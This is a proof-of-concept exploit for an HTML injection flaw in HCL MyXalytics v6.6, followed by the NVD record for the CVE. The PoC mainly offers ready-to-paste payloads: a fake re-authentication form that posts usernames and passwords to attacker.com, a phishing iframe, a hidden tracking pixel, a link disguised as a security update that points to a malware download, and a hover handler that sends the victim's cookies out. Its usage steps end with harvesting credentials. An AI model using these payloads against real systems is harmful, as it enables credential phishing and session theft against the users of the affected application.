CVE-2025-52654

<!-- CVE-2025-52654 - HCL MyXalytics HTML Injection PoC --> <!-- This PoC demonstrates HTML injection in vulnerable input fields --> <!-- Example 1: Injecting a fake login form for phishing --> <div style="border: 1px solid #ccc; padding: 20px; background: #f9f9f9;"> <h3>Session Expired - Please Re-authenticate</h3> <form action="https://attacker.com/steal-credentials" method="POST"> <label>Username: <input type="text" name="username"></label><br> <label>Password: <input type="password" name="password"></label><br> <input type="submit" value="Login"> </form> </div> <!-- Example 2: Injecting an iframe to overlay malicious content --> <iframe src="https://attacker.com/phishing-page" width="800" height="600" style="border:none;"></iframe> <!-- Example 3: Injecting a hidden image for tracking/CSRF --> <img src="https://attacker.com/track?user=victim_id" width="1" height="1" style="display:none;"> <!-- Example 4: Injecting a malicious redirect link --> <a href="https://attacker.com/malware-download" style="color:red;font-size:24px;"> Click here for important security update! </a> <!-- Example 5: Injecting a fake error message with credential harvesting --> <script>// Note: Pure HTML injection may not execute scripts, but can be combined with other vulns</script> <div onmouseover="document.location='https://attacker.com/log?cookie='+document.cookie"> Hover here for details </div> <!-- Usage: 1. Authenticate to HCL MyXalytics v6.6 with low-privilege credentials 2. Navigate to the vulnerable input field (e.g., report description, dashboard title) 3. Paste one of the above HTML payloads 4. When another user views the content, the injected HTML will be rendered 5. Harvest credentials or perform further attacks via the injected elements -->

{"cve": {"id": "CVE-2025-52654", "sourceIdentifier": "[email protected]", "published": "2025-10-03T19:15:46.487", "lastModified": "2025-10-10T14:15:42.840", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL MyXalytics v6.6 is affected by an HTML Injection. This issue occurs when untrusted input is included in the output without proper handling, potentially allowing unauthorized content injection and manipulation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:dryice_myxalytics:6.6:*:*:*:*:*:*:*", "matchCriteriaId": "63206848-DCF7-4835-A58C-5F3E7F455E5C"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124411", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}